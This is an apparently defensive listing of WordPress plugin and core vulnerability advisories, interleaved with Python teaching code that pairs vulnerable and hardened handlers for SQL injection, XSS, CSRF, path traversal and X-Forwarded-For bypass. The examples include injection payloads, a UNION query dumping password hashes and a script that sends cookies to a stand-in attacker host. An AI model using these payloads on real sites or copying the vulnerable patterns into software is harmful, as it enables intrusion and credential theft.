WordPress Unconfirmed Plugin <= 1.2.4 - XSS
This cross-site scripting vulnerability allows attackers to inject arbitrary web script or HTML via the "s" parameter. Solution: Update the plugin...
WordPress All In One WP Security & Firewall Plugin <= 3.8.7 - SQL Injection
This SQL injection vulnerability allows attackers to execute arbitrary SQL commands via unspecified vectors. Solution: Upgrade the plugin...
WordPress All In One WP Security & Firewall Plugin <= 3.8.9 - CSRF
This cross-site request forgery vulnerability allows attackers to hijack the authentication of administrators for requests that delete the log of 404 HTTP status codes. Solution: Update the plugin...
WordPress Sodahead Polls Plugin <= 2.0.3 - Multiple XSS
These vulnerabilities allow attackers to inject arbitrary web script or HTML. Solution: Update the plugin...
WordPress Twitter LiveBlog Plugin <= 1.1.2 - CSRF and XSS
These cross-site request forgery vulnerabilities allow attackers to hijack the authentication of administrators for requests that change plugin settings via unspecified vectors or conduct cross-site scripting attacks. Solution: Update the plugin...
WordPress wpCommentTwit Plugin <= 0.5 - Multiple CSRF and XSS
These cross-site request forgery vulnerabilities allow attackers to hijack the authentication of administrators for requests that change plugin settings via unspecified vectors or conduct cross-site scripting attacks. Solution: This plugin is closed...
WordPress WPDataTables Plugin 1.5.3 - SQL Injection
The WPDataTables plugin is prone to SQL injection. This vulnerability allows an attacker to modify data, compromise access to the application, or exploit latent vulnerabilities in the underlying database. Solution: Upgrade the plugin...
WordPress <= 4.0.0 - XSS #3
This vulnerability in the "media-playlists" function allows attackers to inject arbitrary web script or HTML via unspecified vectors. Related records: http://db.threatpress.com/vulnerability/wordpress/wordpress-4-0-0-xss...
WordPress Easy MailChimp Forms Plugin <= 5.0.6 - XSS
This vulnerability allows attackers to inject arbitrary web script or HTML via the updateoptions action to wp-admin/admin-ajax.php. Solution: Update the plugin...
WordPress Contact Form DB Plugin <= 2.8.15 - Multiple XSS
These vulnerabilities allow attackers to inject arbitrary web script or HTML via the "form" or "enc" parameter. Solution: Update the plugin...
WordPress Titan Framework Plugin <= 1.5 - Multiple XSS
These vulnerabilities allow attackers to inject arbitrary web script or HTML via the "t" parameter to iframe-googlefont-preview.php or the "text" parameter to iframe-font-preview.php. Solution: Update the plugin...
WordPress WP Ban Plugin <= 1.6.3 - BYPASS
This vulnerability allows attackers to bypass the IP blacklist via a crafted X-Forwarded-For header, because the header is client-controlled and is trusted as the source address. Solution: Update the plugin...
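The WP Ban entry above is an instance of a general mistake: treating X-Forwarded-For as the client address even though any client can send that header. The following Python example is added here to illustrate the bug class and its fix; it is not the plugin's code, and the ban list, trusted proxy range and header dictionary are constructed for the demo.

```python
"""X-Forwarded-For (XFF) blacklist bypass: vulnerable lookup beside a hardened one.

Added illustration, not WP Ban's code. BANLIST and TRUSTED_PROXIES are constructed.
"""
import ipaddress

BANLIST = {"203.0.113.7"}            # constructed: one banned client address
TRUSTED_PROXIES = ["192.0.2.0/24"]    # constructed: the site's own reverse proxies


def client_ip_vulnerable(remote_addr, headers):
    """Bug pattern: honour X-Forwarded-For whenever it is present.
    The header is supplied by the client, so a banned host simply claims
    any other address and the blacklist check never sees its real one."""
    xff = headers.get("X-Forwarded-For")
    if xff:
        return xff.split(",")[0].strip()
    return remote_addr


def _is_trusted_proxy(ip, trusted):
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in ipaddress.ip_network(net) for net in trusted)


def client_ip_hardened(remote_addr, headers, trusted=TRUSTED_PROXIES):
    """Use X-Forwarded-For only when the TCP peer is one of our proxies, then
    walk the chain from the right and skip our own hops. The leftmost entries
    are whatever the client sent, so they are never used as the source."""
    if not _is_trusted_proxy(remote_addr, trusted):
        return remote_addr
    xff = headers.get("X-Forwarded-For", "")
    hops = [h.strip() for h in xff.split(",") if h.strip()]
    for hop in reversed(hops):
        if not _is_trusted_proxy(hop, trusted):
            try:
                ipaddress.ip_address(hop)
            except ValueError:
                return remote_addr  # garbage in the header: fall back to the peer
            return hop
    return remote_addr


def is_banned(ip, banlist=BANLIST):
    return ip in banlist


def demo():
    """Banned host connects directly with a spoofed header, and once via a proxy."""
    spoofed = {"X-Forwarded-For": "198.51.100.9"}
    direct = ("203.0.113.7", spoofed)
    via_proxy = ("192.0.2.10", {"X-Forwarded-For": "203.0.113.7, 192.0.2.10"})
    return {
        "vuln_direct": is_banned(client_ip_vulnerable(*direct)),
        "hard_direct": is_banned(client_ip_hardened(*direct)),
        "hard_via_proxy": is_banned(client_ip_hardened(*via_proxy)),
    }


if __name__ == "__main__":
    print(demo())
```

The hardened version only changes the answer when the request really arrived through a listed proxy; a direct connection from a banned address is still caught no matter what header it carries.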
WordPress Content Audit Plugin <= 1.6.0 - SQL Injection
SQL injection vulnerability in content-audit-schedule.php in the Content Audit plugin before 1.6.1 for WordPress allows remote attackers to execute arbitrary SQL commands via the "Audited content types" option in the content-audit page to wp-admin/options-general.php. Solution: Update the plugin...
WordPress Simple Retail Menus Plugin <= 4.0 - SQL Injection
This vulnerability in includes/mode-edit.php allows remote authenticated editors to execute arbitrary SQL commands via the "targetmenu" parameter in an edit action to wp-admin/admin.php. Solution: Update the plugin...
WordPress ZooEffect Plugin <= 1.08 - Reflected XSS
This plugin is prone to a reflected cross-site scripting vulnerability via the HTTP Referer header. Solution: Update the plugin...
WordPress Gallery Objects Plugin 0.4 - SQL Injection
The Gallery Objects plugin is prone to SQL injection. This vulnerability allows an attacker to modify data, compromise access to the application, or exploit latent vulnerabilities in the underlying database. Solution: Update the plugin...
WordPress Video Posts Webcam Recorder Plugin <= 1.55.4 - XSS
This vulnerability in posts/videowhisper/rlogout.php allows attackers to inject arbitrary web script or HTML. Solution: Update the plugin...
WordPress Verification Code for Comments Plugin <= 2.1.0 - Multiple XSS
These vulnerabilities in vcc.js.php allow attackers to inject arbitrary web script or HTML. Solution: Update the plugin...
WordPress VideoWhisper Video Presentation Plugin <= 3.30 - Multiple XSS
These vulnerabilities allow attackers to inject arbitrary web script or HTML. Solution: Update the plugin...
WordPress WP FaceThumb Plugin <= 1.0 - XSS
This vulnerability allows attackers to inject arbitrary web script or HTML via the "ajaxurl" parameter to index.php. Solution: Update the plugin...
WordPress BIC Media Widget Plugin <= 1.0 - XSS
This vulnerability allows attackers to inject arbitrary web script or HTML via the "param" parameter. Solution: Update the plugin...
WordPress Tera Charts Plugin - Remote Path Traversal File Disclosure
The "fn" parameter of the Tera Charts plugin's zoomabletreemap.php is prone to a remote path traversal file disclosure vulnerability that allows an attacker to obtain potentially sensitive information. Other attacks are also possible. Solution: Update the plugin...
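Path traversal file disclosure, as in the Tera Charts entry above, arises when a user-supplied file name is joined onto a data directory and opened without confining the result. The Python example below is added to show that pattern beside a confined version; it is not the plugin's code, and the chart directory, file names and "secret" file are constructed for the demo (the secret stands in for something like wp-config.php).

```python
"""Path traversal file disclosure: unconfined open() beside a confined one.

Added illustration, not the Tera Charts plugin's code. The sandbox directory and
its files are constructed here so the demo runs offline.
"""
import os
import tempfile


def build_sandbox():
    """Constructed fixture: a chart data directory with one legitimate file,
    and a 'secret' file one level above it that must never be served."""
    root = tempfile.mkdtemp()
    charts = os.path.join(root, "charts")
    os.mkdir(charts)
    with open(os.path.join(charts, "tree.json"), "w") as f:
        f.write('{"name": "root"}')
    with open(os.path.join(root, "secret.txt"), "w") as f:
        f.write("DB_PASSWORD=hunter2")
    return root, charts


def read_chart_vulnerable(charts_dir, fn):
    """Bug pattern: the request parameter is joined onto the directory and
    opened. '../' walks out of the directory; an absolute fn replaces it."""
    with open(os.path.join(charts_dir, fn)) as f:
        return f.read()


def confined_path(charts_dir, fn):
    """Resolve symlinks and '..' on both sides, then require the target to be
    inside the data directory. Returns the resolved path, or None if it
    escapes. NUL bytes are rejected because they truncate C-level paths."""
    if "\0" in fn:
        return None
    base = os.path.realpath(charts_dir)
    target = os.path.realpath(os.path.join(base, fn))
    # commonpath (not startswith) so that /data/charts2 is not mistaken for /data/charts
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def read_chart_hardened(charts_dir, fn):
    target = confined_path(charts_dir, fn)
    if target is None:
        raise ValueError("path escapes chart directory: %r" % fn)
    with open(target) as f:
        return f.read()


def demo():
    root, charts = build_sandbox()
    results = {"legit": read_chart_hardened(charts, "tree.json")}
    results["vuln_leak"] = read_chart_vulnerable(charts, "../secret.txt")
    try:
        read_chart_hardened(charts, "../secret.txt")
        results["hard_leak"] = True
    except ValueError:
        results["hard_leak"] = False
    return results


if __name__ == "__main__":
    print(demo())
```

Resolving with realpath before the prefix check matters: a lexical check on the raw string is defeated by `..` segments and by symlinks inside the data directory, and a plain `startswith` check is defeated by sibling directories that share the prefix.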
WordPress iMember360 Plugin <= 3.9.001 - Disclosure of Database Credentials
This vulnerability allows attackers to obtain database credentials via the "i4wdbinfo" parameter. Solution: Update the plugin...
WordPress Contact Bank Plugin <= 2.0.19 - XSS
This vulnerability allows attackers to inject arbitrary web script or HTML via the Label field in the form layout configuration. Solution: Update the plugin...
WordPress NextCellent Gallery Plugin <= 1.19.17 - XSS
This vulnerability in admin/manage-images.php allows authenticated users to inject arbitrary web script or HTML via the "Alt & Title Text" field. Solution: Update the plugin...
WordPress 2.0.11 - Cross Site Request Forgery
WordPress 2.0.11 is prone to cross-site request forgery via "/wp-admin/options-discussion.php", which allows an attacker to perform unauthorized actions in the context of the affected application. Solution: Update WordPress...
WordPress Dropdown Menu Widget Plugin <= 1.7.1 - CSRF and XSS
This vulnerability allows attackers to hijack the authentication of arbitrary users for requests that insert cross-site scripting sequences. Solution: Update the plugin...
WordPress Login With Ajax Plugin <= 3.0 - CSRF
This vulnerability allows attackers to hijack the authentication of arbitrary users for requests that modify the plugin's settings. Solution: Update the plugin...
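The CSRF entries on this page (All In One WP Security & Firewall deleting 404 logs, Twitter LiveBlog, wpCommentTwit, WordPress 2.0.11's options-discussion.php, Dropdown Menu Widget, Login With Ajax) share one root cause: a state-changing admin action authorised by the session cookie alone, which the browser attaches to any cross-site form post. The Python example below is added to show that pattern beside a version that requires a per-user, per-action, time-limited HMAC token, in the style of WordPress nonces. It is not code from any of these plugins or from WordPress core; the secret, the session dictionary and the "delete_404_logs" action are constructed, and the field name `_wpnonce` only borrows the WordPress convention.

```python
"""CSRF on an admin action: cookie-only authorisation beside a nonce-checked one.

Added illustration, not plugin or WordPress core code. SECRET, the session
dictionary and the action name are constructed for the demo.
"""
import hashlib
import hmac

SECRET = b"constructed-site-secret-not-a-real-key"
TICK = 12 * 3600  # tokens rotate every 12h and the previous tick stays valid


def _tick(now):
    return int(now // TICK)


def make_nonce(user_id, action, now, secret=SECRET):
    """HMAC over (time tick, action, user) so a token from another user, another
    action or an old window does not verify. Truncation keeps URLs short."""
    msg = "%d|%s|%s" % (_tick(now), action, user_id)
    return hmac.new(secret, msg.encode(), hashlib.sha256).hexdigest()[:16]


def verify_nonce(nonce, user_id, action, now, secret=SECRET):
    """Accept the current tick or the previous one; constant-time compare."""
    for t in (now, now - TICK):
        expected = make_nonce(user_id, action, t, secret)
        if hmac.compare_digest(expected, nonce or ""):
            return True
    return False


def delete_404_logs_vulnerable(request, session, logs):
    """Bug pattern: only the role carried by the session cookie is checked.
    A form on an attacker's page that posts here is sent with the admin's
    cookie, so the logs are wiped without the admin intending it."""
    if session.get("role") != "administrator":
        return False
    logs.clear()
    return True


def delete_404_logs_hardened(request, session, logs, now):
    """Same action, but the request must carry a token that only a page we
    rendered for this user and this action could have contained."""
    if session.get("role") != "administrator":
        return False
    if not verify_nonce(request.get("_wpnonce"), session["user_id"],
                        "delete_404_logs", now):
        return False
    logs.clear()
    return True


if __name__ == "__main__":
    now = 1_700_000_000.0
    sess = {"user_id": 1, "role": "administrator"}
    forged = {}  # cross-site form post: cookie rides along, no nonce
    print("vulnerable wipes logs:", delete_404_logs_vulnerable(forged, sess, ["404 /x"]))
    print("hardened wipes logs:  ", delete_404_logs_hardened(forged, sess, ["404 /x"], now))
```

Binding the token to the user and the action is what stops the cross-site page: the attacker can make the victim's browser send a request, but cannot read a token rendered into a page in the victim's session, and a token captured for one action does not verify for another.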
WordPress WP MailUp Plugin <= 1.3.1 - BYPASS
This vulnerability allows attackers to modify plugin settings and conduct cross-site scripting attacks via unspecified vectors. Solution: Update the plugin...
WordPress Lazyest Backup Plugin <= 0.2.1 - XSS
This vulnerability in lazyest-backup.php allows attackers to inject arbitrary web script or HTML via the "xmlorall" parameter. Solution: Update the plugin...
WordPress Connections Plugin <= 0.7.1.5 - Unspecified vulnerability
This vulnerability has unknown impact and attack vectors. Solution: Update the plugin...
WordPress Mingle Forum Plugin <= 1.0.34 - Multiple XSS
These vulnerabilities allow attackers to inject arbitrary web script or HTML. Solution: Update the plugin...
WordPress FLV Player Plugin 1.1 - SQL Injection
The "id" parameter of the FLV Player plugin is prone to SQL injection. This vulnerability allows an attacker to modify data, compromise access to the application, or exploit latent vulnerabilities in the underlying database. Solution: Update the plugin...
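The SQL injection entries on this page (WPDataTables, Content Audit, Simple Retail Menus, Gallery Objects, FLV Player's "id" parameter, Mingle Forum, BuddyPress, AdRotate, Copperleaf Photolog) all describe the same defect: a request parameter concatenated into a query. The Python example below is added to show, on an in-memory SQLite database, what "modify data, compromise access" means in practice for a numeric id lookup, beside the parameterised form. It is not any plugin's code; the `videos` and `users` tables, their rows and the password hash are constructed for the demo.

```python
"""SQL injection through a numeric id parameter: concatenation beside binding.

Added illustration, not plugin code. The schema and rows are constructed;
sqlite3 stands in for the site's database.
"""
import sqlite3


def build_db():
    """Constructed fixture: one public and one private video, plus a users table
    the video lookup was never meant to expose."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE videos (id INTEGER PRIMARY KEY, title TEXT, public INTEGER);
        INSERT INTO videos VALUES (1, 'Public launch clip', 1);
        INSERT INTO videos VALUES (2, 'Unreleased demo', 0);
        CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, pass_hash TEXT);
        INSERT INTO users VALUES (1, 'admin', '$P$Bconstructedhash');
    """)
    return conn


def get_video_vulnerable(conn, video_id):
    """Bug pattern: the request value is pasted into the statement. Because
    AND binds tighter than OR, '2 OR 1=1' turns the public=1 filter into a
    no-op, and a UNION reads any other table the DB user can see."""
    sql = "SELECT title FROM videos WHERE public = 1 AND id = %s" % video_id
    return [row[0] for row in conn.execute(sql)]


def get_video_hardened(conn, video_id):
    """Coerce to the type the column actually has, then bind. The value can
    no longer change the statement's structure, only the compared number."""
    try:
        vid = int(video_id)
    except (TypeError, ValueError):
        return []
    sql = "SELECT title FROM videos WHERE public = 1 AND id = ?"
    return [row[0] for row in conn.execute(sql, (vid,))]


TAUTOLOGY = "2 OR 1=1"
UNION_DUMP = "0 UNION SELECT login || ':' || pass_hash FROM users"


if __name__ == "__main__":
    conn = build_db()
    for payload in ("1", TAUTOLOGY, UNION_DUMP):
        print(repr(payload))
        print("  vulnerable:", get_video_vulnerable(conn, payload))
        print("  hardened:  ", get_video_hardened(conn, payload))
```

The int() coercion is the appropriate fix for an id column; for string columns the binding alone does the work, and the lesson is the same: the parameter travels to the database as data, never as part of the statement text.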
WordPress Mingle Forum Plugin <= 1.0.32 - Multiple SQL Injection #2
These vulnerabilities in fs-admin/fs-admin.php allow authenticated users to execute arbitrary SQL commands via the "usergroup" parameter in an addusertogroup action or the "addforumgroupid" parameter in an addforumsubmit action. Solution: Update the plugin...
WordPress Pretty Link Lite Plugin <= 1.5.3 - XSS
This vulnerability in pretty-bar.php allows attackers to inject arbitrary web script or HTML via the "slug" parameter. Solution: Update the plugin...
WordPress Zingiri Web Shop Plugin <= 2.4.0 - Multiple XSS Vulnerabilities
The Zingiri Web Shop plugin is prone to multiple cross-site scripting vulnerabilities. JavaScript submitted in the "$_POST['notes']" variable is stored in the database; when an administrator views the list of ordered items, the JavaScript is loaded from the database and starts...
WordPress BuddyPress Plugin 1.5.5 - Remote SQL Injection
The BuddyPress plugin is prone to remote SQL injection. This vulnerability allows an attacker to modify data, alter queries to the application's SQL database, compromise access to the application, or exploit latent vulnerabilities in the underlying database. Solution: Update the plugin...
WordPress Recent Comments Plugin <= 2.0.6 - XSS
This vulnerability in core.php allows attackers to inject arbitrary web script or HTML via the "page" parameter. Solution: Update the plugin...
WordPress RedLine Theme 1.65 - Cross Site Scripting
The "s" parameter of the WordPress RedLine theme is prone to a cross-site scripting vulnerability because the theme fails to properly sanitize user-supplied input. An attacker may execute arbitrary script code in the browser of a user in the context of the affected site. In this way the attacker can steal cookie-based...
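Reflecting a search term such as the "s" parameter (RedLine above, Unconfirmed at the top of this page) back into the page without output encoding is the most common defect in this listing. The Python example below is added to show the reflection in two HTML contexts, an attribute value and element text, beside the encoded version, with a small parser-based check of whether injected markup survives into the rendered page. It is not theme or plugin code; the page template and the two payloads are constructed for the demo.

```python
"""Reflected XSS via a search parameter: raw reflection beside HTML-encoded output.

Added illustration, not theme or plugin code. The template and payloads are
constructed for the demo.
"""
import html
from html.parser import HTMLParser


def render_search_vulnerable(term):
    """Bug pattern: the parameter is reflected both inside an attribute value
    and as element text. A double quote breaks out of the attribute; a '<'
    starts a new tag in the text context."""
    return ('<form><input name="s" value="%s"></form>'
            '<p>Results for %s</p>') % (term, term)


def render_search_hardened(term):
    """html.escape with quote=True encodes & < > " and ', which covers both the
    double-quoted attribute context and the text context used here."""
    safe = html.escape(term, quote=True)
    return ('<form><input name="s" value="%s"></form>'
            '<p>Results for %s</p>') % (safe, safe)


class _MarkupAudit(HTMLParser):
    """Demo-only check: record script elements and on* event-handler attributes
    that the parser actually sees, i.e. markup that would run in a browser."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        for name, _ in attrs:
            if name.startswith("on"):
                self.findings.append("event handler " + name)


def injected_markup(rendered):
    audit = _MarkupAudit()
    audit.feed(rendered)
    audit.close()
    return audit.findings


# Constructed payloads: one for the text context, one for the attribute context.
COOKIE_THIEF = ("<script>new Image().src='http://attacker.example/?c='"
                "+document.cookie</script>")
ATTR_BREAKOUT = '" onfocus="alert(document.cookie)" autofocus="'


if __name__ == "__main__":
    for payload in (COOKIE_THIEF, ATTR_BREAKOUT, "shoes & boots"):
        print(repr(payload))
        print("  vulnerable:", injected_markup(render_search_vulnerable(payload)))
        print("  hardened:  ", injected_markup(render_search_hardened(payload)))
```

The encoding is context-specific: the same escape is not sufficient inside a JavaScript string, a URL, or an unquoted attribute, which is why the template here quotes the attribute value.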
WordPress Morning Coffee Theme 3.5 - Cross Site Scripting
The "index.php" parameter of the WordPress Morning Coffee theme is prone to a cross-site scripting vulnerability because the theme fails to properly sanitize user-supplied input. An attacker may execute arbitrary script code in the browser of a user in the context of the affected site. In this way the attacker can ste...
WordPress AdRotate Plugin <= 3.6.5 - SQL Injection
The AdRotate plugin is prone to SQL injection. This vulnerability allows an attacker to modify data, alter queries to the application's SQL database, compromise access to the application, or exploit latent vulnerabilities in the underlying database. Solution: Upgrade the plugin...
WordPress UnGallery plugin <= 1.5.8 - Local File Disclosure
This vulnerability allows an attacker to obtain sensitive information from local files on systems running the vulnerable plugin. Other attacks are also possible. Solution: Update the plugin...
WordPress <= 3.1.2 - Unspecified vulnerability #2
This vulnerability has unknown impact and attack vectors, related to "Media security", in this WordPress version. Solution: Update WordPress...
WordPress Mediatricks Viva Thumbs Plugin - Multiple Information Disclosure Vulnerabilities
The Mediatricks Viva Thumbs plugin is prone to multiple information-disclosure vulnerabilities because it fails to properly sanitize user-supplied input. Attackers may use these issues to confirm the existence of local files outside the WordPress webroot. The information they obtain can be useful...
WordPress <= 3.0.1 - SQL Injection
This vulnerability allows authenticated users to execute arbitrary SQL commands via the Send Trackbacks field. Solution: Update WordPress...
WordPress Copperleaf Photolog Plugin 0.16 - SQL injection Vulnerability
The Copperleaf Photolog plugin is prone to an SQL injection vulnerability that allows attackers to execute arbitrary SQL commands via the "postid" parameter. Solution: Update the plugin...
WordPress 2.9 - Failure to Restrict URL Access
A new feature called "Trash" was implemented so that users could recover posts they had deleted by accident. Any post placed in the trash is viewable by any authenticated user, regardless of their privileges. Solution: Update WordPress, because since versio...
JD-WordPress 2.0 RC2 - Remote file inclusion
The vulnerabilities in JD-WordPress allow remote attackers to execute arbitrary PHP code via a URL in the mosConfigabsolutepath parameter in (1) wp-comments-post.php, (2) wp-feed.php, or (3) wp-trackback.php. Solution: Update WordPress...
WordPress 2.8.1 - Remote Cross-Site Scripting Vulnerability
This version of WordPress is prone to a cross-site scripting vulnerability. Solution: Update WordPress...
WordPress Lytebox Plugin 1.3 - Local File Inclusion
WP-Lytebox fails to properly sanitize user-supplied input, which allows an attacker to include a file. An attacker can view files and execute scripts. Solution: Upgrade to version 1.3.1 or later...